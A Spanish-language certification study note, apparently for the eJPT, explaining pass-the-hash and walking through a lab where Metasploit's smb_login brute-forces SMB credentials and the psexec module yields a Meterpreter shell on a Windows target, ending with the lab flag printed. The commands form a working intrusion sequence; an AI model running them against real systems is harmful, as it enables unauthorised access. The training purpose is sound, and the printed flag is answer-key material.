> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/postexplotacion-en-windows/pass-the-hash-con-psexec.md).

# Pass-The-Hash con PsExec

* **Pass-the-Hash** es una técnica de explotación que consiste en **capturar o recolectar hashes NTLM o contraseñas en texto claro** y usarlos para **autenticarse legítimamente** en un sistema objetivo.
* Esta técnica **no requiere conocer la contraseña en texto claro**, solo el hash NTLM.

***

### 📌 Uso del módulo PsExec en Metasploit

* Podemos utilizar el módulo **`psexec`** de Metasploit para **autenticarnos legítimamente** en el sistema víctima a través del protocolo **SMB**.
* Al autenticarnos con un **hash NTLM válido**, obtenemos acceso al sistema como si conociéramos la contraseña real.

***

### ✅ Ventajas del Pass-The-Hash

* Nos da acceso a sistemas utilizando **credenciales legítimas**, en lugar de depender de una explotación de vulnerabilidades de software.
* Ideal para moverse lateralmente en una red una vez que se han recolectado hashes válidos.

***

## 🧪 Laboratorio práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/MMHmaZtu91Dfdx0QACbw" alt=""><figcaption></figcaption></figure>

**Paso 2:** Ejecute un escaneo de Nmap contra el objetivo.

**Dominio:**

```
nmap demo.ine.local
```

<figure><img src="/files/gaW64TGfdpikO0ZGwPyq" alt=""><figcaption></figcaption></figure>

**Paso 3:** Hemos descubierto que varios puertos están abiertos. El puerto SMB 445 también está expuesto. Ejecutaremos el script nmap para listar los protocolos y dialectos compatibles con un servidor SMB.

**Dominio:**

```
nmap -p445 --script smb-protocols demo.ine.local
```

<figure><img src="/files/kFFfCVsyZKW5yHTjhxBD" alt=""><figcaption></figcaption></figure>

**Paso 4:** Ejecutaremos el módulo smb\_login para encontrar todos los usuarios válidos y sus contraseñas.

**Comandos:**

```
msfconsole -q
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS demo.ine.local
set VERBOSE false
exploit
```

<figure><img src="/files/1ziMSx2khTBQ0i1C0glZ" alt=""><figcaption></figcaption></figure>

Hemos encontrado cuatro usuarios válidos y sus contraseñas.

**Paso 5:** Ejecutar el módulo psexec para obtener el shell de meterpreter.

**Comandos:**

```
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser Administrator
set SMBPass qwertyuiop
exploit
```

<figure><img src="/files/U7f0vniCped70gCEhExn" alt=""><figcaption></figcaption></figure>

Hemos recibido un caparazón de meterpreter.

**Paso 6:** Buscando la bandera.

**Dominio:**

```
shell
cd /
dir
type flag.txt
```

<figure><img src="/files/pjnZHE8iUVWPrij6vR7O" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

Bandera: e0da81a9cd42b261bc9b90d15f780433

#### Conclusión

En este laboratorio, aprendimos sobre el proceso de explotación de SMB con PsExec.
